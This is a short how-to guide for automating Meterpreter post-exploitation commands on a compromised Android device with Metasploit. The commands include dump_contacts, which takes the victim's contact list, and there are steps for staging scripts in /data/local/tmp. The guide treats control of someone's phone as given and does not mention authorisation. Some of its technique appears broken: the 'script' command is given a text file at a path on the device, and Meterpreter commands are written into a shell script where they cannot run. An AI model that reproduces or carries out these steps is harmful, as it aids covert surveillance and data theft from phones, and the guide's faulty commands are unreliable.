TL;DR
This guide shows you how to automatically run commands when a Meterpreter session starts on an Android device using Metasploit. We’ll use the sessions -i command with a script file containing your desired commands.
Prerequisites
- Metasploit Framework installed and running
- An active Meterpreter session on an Android device
Step-by-Step Guide
- Create a Command Script File
- Access the Session
- Execute the Script
- Automate on Session Start (Post-Exploitation Module)
First, create a text file (e.g., auto_commands.txt) containing the Meterpreter commands you want to execute automatically. Each command should be on a new line.
sysinfo
getuid
dump_contacts
Open Metasploit and access your Meterpreter session using sessions -i <session_id>. Replace <session_id> with the actual ID of your active session.
msf6 > sessions -i 1
meterpreter >
Within the Meterpreter session, use the script command to execute your script. This will run all commands in the file sequentially.
meterpreter > script /data/local/tmp/auto_commands.txt
[*] Running script auto_commands.txt...
... (output of commands) ...
[*] Script completed.
For more robust automation, you can use a post-exploitation module to execute the script automatically when a session is created. This requires creating a custom module or modifying an existing one.
- Create a Custom Post Module (Advanced): This involves writing Ruby code that defines a new module which executes your commands upon session creation. It’s beyond the scope of this basic guide but allows for greater control and flexibility.
- Modify Existing Modules: Some post modules allow you to specify custom scripts or commands to run. Check the documentation of the specific module you are using.
You can attempt to execute a shell script from Meterpreter, but this is less reliable due to Android’s security restrictions.
meterpreter > shell
mkdir /data/local/tmp/script_folder
echo "sysinfo" > /data/local/tmp/script_folder/run.sh
echo "getuid" >> /data/local/tmp/script_folder/run.sh
chmod +x /data/local/tmp/script_folder/run.sh
/data/local/tmp/script_folder/run.sh
Note: This method may require root access or specific permissions to execute the script successfully.
- Permissions: Ensure that the script file has executable permissions if necessary (e.g., using chmod +x).
- File Path: Double-check the path to your script file in the script command.
- Command Syntax: Verify that all commands in the script are valid Meterpreter commands.
- Android Security: Android’s security features may prevent certain commands from executing, especially without root access.